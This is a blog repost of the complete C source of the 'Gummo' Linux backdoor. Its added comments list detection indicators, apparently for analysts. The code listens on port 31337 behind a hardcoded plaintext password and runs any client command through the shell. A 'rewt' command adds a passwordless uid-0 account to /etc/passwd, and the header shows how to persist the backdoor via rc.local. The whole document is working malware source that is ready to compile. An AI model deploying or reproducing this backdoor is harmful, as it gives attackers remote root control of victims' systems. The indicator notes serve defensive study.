linux 後門程序
阿新 • • 發佈:2018-07-15
/*
/* Gummo 後門服務器
/* 編譯: cc server.c -o server
/* 使用: ./server &
/* echo /tmp/server & >> /etc/rc.d/rc.local
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
/*
 * Compile-time settings of the listener. For an analyst each value is also
 * a host or network indicator for this sample.
 */
// TCP port the listener binds in main(); an unexpected listener on it is an indicator.
#define PORT 31337
// Queue length passed to listen().
#define BACKLOG 5
// Scratch file that command() creates, deletes and re-creates to capture command
// output; its presence in /tmp is a file-system indicator.
#define CMD_LOG "/tmp/.cmd"
// Shared secret compared with strcmp() in main(). It is a plaintext literal, so it
// should be recoverable from the compiled binary by string inspection.
#define PASSWORD "password"
/* global */
// Accepted client socket: assigned in main(), used by command() for all I/O.
int newfd;
void command ();
/*
 * Entry point of the backdoor listener.
 *
 * Opens a TCP socket, binds it to PORT on INADDR_ANY, and accepts connections
 * in an endless loop. Each client is sent a "Password: " prompt; the reply is
 * compared with PASSWORD and, on a match, control passes to command(), which
 * runs what the client sends. Prompt, password and banners travel over the
 * plain socket with no encryption, so they are visible in a packet capture.
 *
 * Defender view: a process listening on PORT on all interfaces, the literal
 * banners sent below, and (per the file header) a start-up line for the binary
 * in /etc/rc.d/rc.local are the indicators this function contributes.
 */
void
main ()
{
int sockfd, sin_size, ss, len, bytes;
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
char passwd[1024];
char *prompt = "Password: ";
char *gp;
// create a socket
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket");
exit (1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons (PORT);
// INADDR_ANY: the listener is reachable on every local interface
my_addr.sin_addr.s_addr = INADDR_ANY;
bzero (&(my_addr.sin_zero), 8);
// bind the port
if (bind (sockfd, (struct sockaddr *) &my_addr, sizeof (struct sockaddr)) == -1)
{
perror ("bind");
exit (1);
}
// listen
if (listen (sockfd, BACKLOG) == -1)
{
perror ("listen");
exit (1);
}
while (1)
{
ss = sizeof (struct sockaddr_in);
// keep accepting; accept() returns a new socket for each client
if ((newfd = accept (sockfd, (struct sockaddr *) &their_addr, &sin_size)) == -1)
{
perror ("accept");
exit (1);
}
// create a process
// fork() returns 0 in the child, -1 on error, the child's pid in the parent
// The branch below runs for any non-zero return; the child skips it and goes
// back to accept() on the same listening socket.
if (fork ())
{
/////////////////// in the parent process /////////////////////////
len = strlen (prompt);
// send data on the new socket, i.e. to the client
bytes = send (newfd, prompt, len, 0);
// receive the client's data, i.e. the password
recv (newfd, passwd, 1024, 0);
// find the first occurrence of byte 13 (carriage return) and cut the string there
if ((gp = strchr (passwd, 13)) != NULL)
*(gp) = ‘\0‘;
// password correct
if (!strcmp (passwd, PASSWORD))
{
// continue sending to the client
send (newfd, "準許訪問, HEH\n", 21, 0);
send (newfd, "\n\n\n\n\n\n歡迎來到Gummo後門服務器!\n\n", 41, 0);
send (newfd, "Type ‘HELP‘ for a list of commands\n\n", 36, 0);
// hand over to the loop that processes every command sent and returns its output to the client
command ();
}
// wrong password: the client socket is closed
// (this condition compares two pointers, not string contents, so it acts as a plain else)
else if (passwd != PASSWORD)
{
send (newfd, "Authentification Failed! =/\n", 29, 0);
close (newfd);
}
}
}
}
/*
 * Command loop for an authenticated client on the global socket newfd.
 *
 * Repeatedly sends the prompt "command:~# ", reads one line, and acts on it.
 * Four keywords are recognised by prefix (HELP, quit, rewt, wipeout); every
 * other non-empty line is passed unchanged to system(), with its output
 * redirected into CMD_LOG and then copied back to the client. Whoever passes
 * the password check in main() therefore runs shell commands with the
 * privileges of this process (presumably root if it is started from rc.local
 * as the file header describes).
 *
 * Defender view, all taken from the code below:
 *  - "rewt" appends the line rewt::0:0::/:/bin/sh to /etc/passwd, i.e. a uid 0
 *    account with an empty password field; auditing /etc/passwd for extra
 *    uid 0 entries or empty password fields exposes it.
 *  - CMD_LOG is created, removed and re-created for each command.
 *  - system() starts a shell per command, so process-execution logging shows
 *    shells whose parent is this binary and whose command line redirects
 *    into CMD_LOG.
 *  - Replies are written in fixed 500-byte chunks padded with zero bytes.
 */
// handle the client's commands
void
command ()
{
FILE *read;
FILE *append;
char cmd_dat[1024];
char *cmd_relay;
char *clean_log;
char buf[5000];
int dxm;
while (1)
{
// send a prompt first
send (newfd, "command:~# ", 11, 0);
// wait for input
recv (newfd, cmd_dat, 1024, 0);
// drop the last two bytes of the line (presumably the CR LF a telnet-style client sends)
cmd_dat[strlen (cmd_dat) - 2] = ‘\0‘;
// skip empty commands
if (strcmp (cmd_dat, ""))
{
// command HELP (strstr() == cmd_dat means "line starts with the keyword")
if ((strstr (cmd_dat, "HELP")) == cmd_dat)
{
//help
send (newfd, "\n\n-=Help Menu=-\n", 16, 0);
//quit
send (newfd, "\nquit - to exit gummo backdoor\n", 31, 0);
//rewt
send (newfd, "rewt - automatically creates non passworded accnt ‘rewt‘ uid0\n", 63, 0);
//wipeout
send (newfd, "wipeout - this feature rm -rf /‘s a box. Inspired by dethcraze\n", 64, 0);
}
// quit: closes the client socket; the loop itself is not left here
if ((strstr (cmd_dat, "quit")) == cmd_dat)
{
close (newfd);
}
// rewt: appends a uid 0 account with an empty password field to /etc/passwd
if ((strstr (cmd_dat, "rewt")) == cmd_dat)
{
system ("echo rewt::0:0::/:/bin/sh>>/etc/passwd;");
send (newfd, "User ‘rewt‘ added!\n", 19, 0);
}
// wipeout: despite the help text, this branch only sends a message and exits the process
if ((strstr (cmd_dat, "wipeout")) == cmd_dat)
{
send (newfd, "你嘗試使用這個命令是不行的, HEH!\n", 54, 0);
close(newfd);
exit(0);
}
else
// create a temporary file to hold the command string
// (the else has no braces, so it governs only the fopen() on the next line)
append = fopen (CMD_LOG, "w");
fprintf (append, "dextro\n");
fclose (append);
// used to clean up the log: builds and runs "rm <CMD_LOG>"
clean_log = (char *) malloc (420);
sprintf (clean_log, "rm %s", CMD_LOG);
system (clean_log);
cmd_relay = (char *) malloc (1024);
// used for output redirection: the client's text is run by the shell as "<text> > <CMD_LOG>;"
snprintf (cmd_relay, 1024, "%s > %s;\0", cmd_dat, CMD_LOG);
system (cmd_relay);
if ((read = fopen (CMD_LOG, "r")) == NULL)
continue;
// copy the captured output back to the client one line at a time
while (!(feof (read)))
{
memset (buf, 0, 500);
fgets (buf, 500, read);
if (buf[0] == 0)
break;
// always writes 500 bytes, so each line reaches the client padded with zero bytes
write (newfd, buf, 500);
}
fclose (read);
}
}
}